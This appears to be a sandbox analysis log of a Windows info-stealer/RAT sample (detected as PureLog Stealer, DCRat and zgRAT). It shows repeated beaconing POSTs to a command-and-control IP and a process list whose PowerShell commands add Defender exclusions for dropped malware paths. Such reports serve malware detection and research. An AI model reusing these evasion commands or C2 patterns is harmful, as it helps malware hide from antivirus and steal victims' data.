                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    138 | 192.168.2.4 | 50145 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:54:03.783979893 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:04.129519939 CET | 2600 | OUT | Data Raw: [payload omitted]
                                                                                                    Jan 4, 2025 14:54:04.325620890 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:04.459122896 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    139 | 192.168.2.4 | 50146 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:54:04.584938049 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:04.942419052 CET2600OUTData Raw: 5c 5a 58 5e 5b 5c 58 57 5b 59 5a 55 50 5b 5b 53 56 57 54 40 52 5c 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZX^[\XW[YZUP[[SVWT@R\RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;>22P>=+7083,>T!?!5W*-+2:/"Y ']/(
                                                                                                    Jan 4, 2025 14:54:05.246531963 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:05.378247976 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.4 | 50147 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:54:05.506494999 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 154.29.71.9
Content-Length: 2600
Expect: 100-continue
Connection: Keep-Alive
Jan 4, 2025 14:54:05.863966942 CET | 2600 | OUT | [request body, 2600 bytes]
Jan 4, 2025 14:54:06.051100969 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:54:06.183644056 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 13:54:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
141 | 192.168.2.4 | 50149 | 154.29.71.9 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:54:06.304794073 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 154.29.71.9
Content-Length: 2600
Expect: 100-continue
Connection: Keep-Alive
Jan 4, 2025 14:54:06.660742044 CET | 2600 | OUT | [request body, 2600 bytes]
Jan 4, 2025 14:54:06.840665102 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:54:06.973901987 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 13:54:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
142 | 192.168.2.4 | 50150 | 154.29.71.9 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:54:07.100914001 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 154.29.71.9
Content-Length: 2600
Expect: 100-continue
Jan 4, 2025 14:54:07.457937956 CET | 2600 | OUT | [request body, 2600 bytes]
Jan 4, 2025 14:54:07.619982004 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:54:07.754127026 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 13:54:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
143 | 192.168.2.4 | 50151 | 154.29.71.9 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:54:07.882301092 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 154.29.71.9
Content-Length: 2600
Expect: 100-continue
Connection: Keep-Alive
Jan 4, 2025 14:54:08.238826990 CET | 2600 | OUT | [request body, 2600 bytes]
Jan 4, 2025 14:54:08.398814917 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:54:08.526118994 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 13:54:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
144 | 192.168.2.4 | 50152 | 154.29.71.9 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:54:08.655899048 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 154.29.71.9
Content-Length: 2600
Expect: 100-continue
Connection: Keep-Alive
Jan 4, 2025 14:54:09.004530907 CET | 2600 | OUT | [request body, 2600 bytes]
Jan 4, 2025 14:54:09.182976007 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:54:09.373821974 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 13:54:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
145 | 192.168.2.4 | 50153 | 154.29.71.9 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:54:09.504528999 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 154.29.71.9
Content-Length: 2600
Expect: 100-continue
Connection: Keep-Alive
Jan 4, 2025 14:54:09.863852978 CET | 2600 | OUT | [request body, 2600 bytes]
Jan 4, 2025 14:54:10.021614075 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:54:10.150187969 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 13:54:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
146 | 192.168.2.4 | 50154 | 154.29.71.9 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:54:10.272804976 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 154.29.71.9
Content-Length: 2600
Expect: 100-continue
Connection: Keep-Alive
Jan 4, 2025 14:54:10.629431009 CET | 2600 | OUT | [request body, 2600 bytes]
Jan 4, 2025 14:54:10.789506912 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:54:10.918051958 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 13:54:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
147 | 192.168.2.4 | 50155 | 154.29.71.9 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:54:11.060946941 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 154.29.71.9
Content-Length: 2600
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port
148 | 192.168.2.4 | 50156 | 154.29.71.9 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:54:11.307321072 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 154.29.71.9
Content-Length: 1856
Expect: 100-continue
Connection: Keep-Alive
Jan 4, 2025 14:54:11.660742044 CET | 1856 | OUT | [request body, 1856 bytes]
Jan 4, 2025 14:54:11.834041119 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:54:11.962294102 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 13:54:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
[response body]


                                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                    149    192.168.2.4    50157    154.29.71.9    80
                                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                                    Jan 4, 2025 14:54:11.455478907 CET    395    OUT    POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:11.801345110 CET    2600    OUT    Data Raw: 5c 5a 58 5a 5b 58 5d 50 5b 59 5a 55 50 5c 5b 5b 56 52 54 49 52 5e 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXZ[X]P[YZUP\[[VRTIR^RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/&&2*7)=$3]<;3%"[ 69T)>$&8Z:/"Y ']/4
                                                                                                    Jan 4, 2025 14:54:11.972917080 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:12.102389097 CET    200    IN    HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0



                                                                                                    Target ID:0
                                                                                                    Start time:08:51:58
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe"
                                                                                                    Imagebase:0x130000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1655633091.0000000000132000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline"
                                                                                                    Imagebase:0x7ff688e60000
                                                                                                    File size:2'759'232 bytes
                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DC7.tmp" "c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP"
                                                                                                    Imagebase:0x7ff7830e0000
                                                                                                    File size:52'744 bytes
                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:19
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:20
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:21
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:22
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:23
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:24
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:25
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:26
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:27
                                                                                                    Start time:08:52:03
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:28
                                                                                                    Start time:08:52:03
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:29
                                                                                                    Start time:08:52:03
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                                    Imagebase:0xc60000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    Target ID:30
                                                                                                    Start time:08:52:04
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                                    Imagebase:0x8f0000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:31
                                                                                                    Start time:08:52:04
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat"
                                                                                                    Imagebase:0x7ff7bca50000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:32
                                                                                                    Start time:08:52:04
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:33
                                                                                                    Start time:08:52:04
                                                                                                    Start date:04/01/2025
